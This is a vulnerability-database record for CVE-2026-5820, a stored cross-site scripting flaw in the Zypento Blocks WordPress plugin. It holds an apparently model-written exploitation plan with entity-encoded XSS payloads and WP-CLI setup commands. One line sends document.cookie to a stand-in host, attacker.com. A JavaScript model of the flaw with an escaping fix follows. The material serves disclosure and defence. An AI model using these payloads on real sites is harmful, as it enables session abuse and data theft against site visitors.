[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpzLSI55iPNtULHsecpWoL-G0bE1224jT5PaCJp0_glk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-5820","zypento-blocks-authenticated-author-stored-cross-site-scripting-via-table-of-contents-block","Zypento Blocks \u003C= 1.0.6 - Authenticated (Author+) Stored Cross-Site Scripting via Table of Contents Block","The Zypento Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Table of Contents block in all versions up to, and including, 1.0.6. This is due to the front-end TOC rendering script reading heading text via `innerText` and inserting it into the page using `innerHTML` without proper sanitization. 
This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","zypento-blocks",null,"\u003C=1.0.6","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:03:28","2026-05-11 21:04:18",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F024a6a0f-f819-40e7-9618-71219c27aa64?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-5820 (Zypento Blocks Stored XSS)\n\n## 1. Vulnerability Summary\nThe Zypento Blocks plugin (\u003C= 1.0.6) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the frontend rendering logic of the \"Table of Contents\" (TOC) block. Specifically, the plugin's front-end script responsible for generating the TOC list on the client side extracts heading text from the page using the `.innerText` property but subsequently inserts this text into the TOC container using the `.innerHTML` property without sanitization. This allows an attacker with Author-level privileges or higher to inject malicious HTML\u002FJavaScript into a heading, which is then executed in the context of any user viewing the page when the TOC script processes it.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Component:** Table of Contents Block (frontend rendering script).\n*   **Endpoint:** WordPress Post Editor (`\u002Fwp-admin\u002Fpost-new.php` or REST API `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`).\n*   **Required Role:** Author, Editor, or Administrator.\n*   **Payload Location:** Inside a Heading block (`h1`, `h2`, `h3`, etc.) 
on a post that also contains the Zypento Table of Contents block.\n*   **Preconditions:** The Zypento Blocks plugin must be active, and a post must be published containing both a TOC block and a malicious heading.\n\n## 3. Code Flow (Inferred)\n1.  **Post Creation:** An Author creates a post containing the block `\u003C!-- wp:zypento\u002Ftable-of-contents \u002F-->` and a heading like `\u003Ch2>&lt;img src=x onerror=alert(1)&gt;\u003C\u002Fh2>`.\n2.  **Frontend Loading:** A user views the post. WordPress enqueues the TOC frontend script (likely named `view.js` or `toc.js` located in the plugin's block assets).\n3.  **Heading Extraction:** The script queries the DOM for heading elements within the post content (e.g., `document.querySelectorAll('h1, h2, h3')`).\n4.  **Vulnerable Sink:**\n    *   The script iterates through the headings.\n    *   It retrieves the \"text\" using `const title = heading.innerText;`. If the heading HTML was `&lt;img src=x onerror=alert(1)&gt;`, `innerText` returns the literal string `\u003Cimg src=x onerror=alert(1)>`.\n    *   The script creates a list item for the TOC and sets its content: `tocItem.innerHTML = `\u003Ca href=\"#...\">${title}\u003C\u002Fa>`;`.\n5.  **Execution:** The browser parses the `innerHTML` assignment, creates the `\u003Cimg>` element, and executes the `onerror` handler.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by saving a post with specific content. \n*   **Post Creation via WP-CLI:** The easiest way to set up the exploit without worrying about REST API nonces or CSRF is to use `wp post create`.\n*   **Manual Exploitation via UI:** If performing the exploit via the browser, the standard WordPress `_wpnonce` for the post editor is required. 
For the block editor this is the REST nonce (`wpApiSettings.nonce`, embedded in the `wp-admin\u002Fpost.php` or `post-new.php` page source) sent in the `X-WP-Nonce` header; the classic editor form posts it as the `_wpnonce` field.\n*   **Frontend Script:** No nonce is required for the *execution* phase, as it occurs automatically when any user (including an Administrator) views the published post.\n\n## 5. Exploitation Strategy\n1.  **Authentication:** Authenticate as an Author user.\n2.  **Payload Preparation:** The payload must be HTML-encoded within the heading so that `innerText` returns the raw HTML tags to be later interpreted by `innerHTML`. Because Authors lack the `unfiltered_html` capability, KSES would strip a real `\u003Cimg>` tag on save, but the entity-encoded text survives untouched; it only becomes markup when the TOC script re-parses it.\n    *   Payload: `&lt;img src=x onerror=\"alert('XSS_SUCCESS_VULN_ID_5820')\"&gt;`\n3.  **Post Injection:** Create a post containing the TOC block and the malicious heading.\n    *   **Block Content:**\n        ```html\n        \u003C!-- wp:zypento\u002Ftable-of-contents {\"title\":\"TOC\"} \u002F-->\n        \u003Ch2>&lt;img src=x onerror=\"alert(window.origin)\"&gt;\u003C\u002Fh2>\n        ```\n4.  **Verification of Trigger:** Navigate to the published post's URL and observe the JavaScript execution.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `zypento-blocks` version 1.0.6 is installed and active.\n2.  **Create Author User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=author --user_pass=password123\n    ```\n3.  **Create Malicious Post:**\n    ```bash\n    # &#39; keeps the JS string quotes out of the single-quoted --post_content argument;\n    # innerText decodes it to a plain apostrophe before innerHTML re-parses the text\n    wp post create --post_type=post \\\n                   --post_status=publish \\\n                   --post_title=\"Vulnerable TOC Page\" \\\n                   --post_author=$(wp user get attacker --field=ID) \\\n                   --post_content='\u003C!-- wp:zypento\u002Ftable-of-contents \u002F-->\u003Ch2>&lt;img src=x onerror=\"console.log(&#39;XSS_TRIGGERED&#39;)\"&gt;\u003C\u002Fh2>'\n    ```\n\n## 7. 
Expected Results\n*   When the post is rendered, the TOC block will be generated by JavaScript.\n*   A link will appear in the TOC.\n*   Because the TOC script uses `innerHTML` to insert the heading's `innerText`, the browser will execute the `onerror` event of the injected image tag.\n*   The browser console will show \"XSS_TRIGGERED\" or an alert box will appear.\n\n## 8. Verification Steps\n1.  **Check Post Content:** Verify the post content was saved correctly (the heading should still contain `&lt;img` as entity-encoded text, neither stripped by KSES nor stored as a live tag).\n    ```bash\n    wp post get \u003CPOST_ID> --field=post_content\n    ```\n2.  **Inspect Frontend HTML:** Use `http_request` to fetch the post and check if the TOC script is enqueued.\n    ```bash\n    # Look for the plugin's JS file\n    curl -s http:\u002F\u002Flocalhost:8080\u002Fvulnerable-toc-page\u002F | grep \"zypento\"\n    ```\n3.  **Simulate Execution:** Use `browser_navigate` to the post URL and check for the console log.\n\n## 9. Alternative Approaches\n*   **Style Injection:** If `alert()` is blocked, try injecting a style tag to deface the page:\n    *   `\u003Ch2>&lt;style&gt;body{background:red !important;}&lt;\u002Fstyle&gt;\u003C\u002Fh2>`\n*   **Data Exfiltration:** Attempt to exfiltrate the administrator's cookie if they view the page:\n    *   `\u003Ch2>&lt;img src=x onerror=\"fetch('http:\u002F\u002Fattacker.com\u002F?c='+document.cookie)\"&gt;\u003C\u002Fh2>`\n    *   Caveat: WordPress sets its authentication cookies `HttpOnly`, so `document.cookie` will not contain them; a more realistic impact demonstration is an authenticated `fetch()` against `\u002Fwp-admin\u002F` or the REST API issued from the victim's session.\n*   **Block Name Variation:** If `zypento\u002Ftable-of-contents` is not the exact slug, check the plugin's `block.json` files or `src\u002Findex.js` for the registered block name. (Inferred slug: `zypento\u002Ftable-of-contents`).","gemini-3-flash-preview","2026-04-27 14:05:18","2026-04-27 14:05:37",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fzypento-blocks\u002Ftags"]
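The code flow in sections 3 and 5 of the research plan (innerText decoding the stored entities, innerHTML re-parsing the result) can be modelled without a browser. The block below is an added example written for this page, not code from the Zypento Blocks plugin, and it assumes the inferred sink shape `<a href="#id">${title}</a>`, a constructed stored heading `<h2>&lt;img src=x onerror=alert(1)&gt;</h2>`, a hypothetical anchor id `h-1`, and an entity decoder limited to the five entities the sample needs. It shows what innerText hands back, what the vulnerable builder emits, and what an escaping builder emits instead.

```javascript
// Added illustration for CVE-2026-5820 (not the plugin's own code). Models the
// inferred client-side flow in plain strings so it runs under Node without a DOM.

// Constructed sample: the heading markup as WordPress stores it for an Author,
// whose literal "<img ...>" text was entity-encoded on save.
const STORED_HEADING_HTML = '<h2>&lt;img src=x onerror=alert(1)&gt;</h2>';

// Minimal entity decoder covering the entities the sample uses (assumption:
// a browser's innerText performs the same decoding for these characters).
function decodeEntities(s) {
  return s
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&quot;/g, '"')
    .replace(/&#39;/g, "'")
    .replace(/&amp;/g, '&');
}

// What heading.innerText returns: the inner text with entities decoded, so the
// stored "&lt;img ...&gt;" comes back as the string "<img ...>".
function headingInnerText(headingHtml) {
  const inner = headingHtml
    .replace(/^<h[1-6][^>]*>/i, '')
    .replace(/<\/h[1-6]>$/i, '');
  return decodeEntities(inner);
}

// Vulnerable builder (the inferred sink): the decoded text is concatenated into
// markup that innerHTML will re-parse, so "<img ...>" becomes a real element.
function buildTocItemVulnerable(title, anchorId) {
  return `<li><a href="#${anchorId}">${title}</a></li>`;
}

// Escape the five characters that can open a tag, attribute or entity.
function escapeHtml(s) {
  return s
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened builder: escape before the string reaches innerHTML. In a browser the
// equivalent is document.createElement('a') plus a.textContent = title, which
// never re-parses the heading text as markup.
function buildTocItemSafe(title, anchorId) {
  return `<li><a href="#${encodeURIComponent(anchorId)}">${escapeHtml(title)}</a></li>`;
}

// Lists element names in the produced markup other than the expected <li>/<a>
// wrapper; any other name means heading text was interpreted as HTML.
function injectedTags(markup) {
  const names = new Set();
  for (const m of markup.matchAll(/<\s*\/?\s*([a-zA-Z][a-zA-Z0-9]*)/g)) {
    const name = m[1].toLowerCase();
    if (name !== 'li' && name !== 'a') names.add(name);
  }
  return [...names];
}

// Runs both builders over the same innerText and reports what each produced.
function demo() {
  const title = headingInnerText(STORED_HEADING_HTML);
  const vulnerable = buildTocItemVulnerable(title, 'h-1');
  const safe = buildTocItemSafe(title, 'h-1');
  return {
    title,
    vulnerable,
    safe,
    vulnerableInjected: injectedTags(vulnerable),
    safeInjected: injectedTags(safe),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Running `node` on the file prints the decoded title `<img src=x onerror=alert(1)>`, the vulnerable list item with a live `<img>` inside the link, and the safe list item where the same text is inert `&lt;img ...&gt;`. The `injectedTags` check is the same test a reviewer can apply to the plugin's real `view.js` output in the browser's Elements panel: any element inside the TOC link that did not come from the script's own template is the bug.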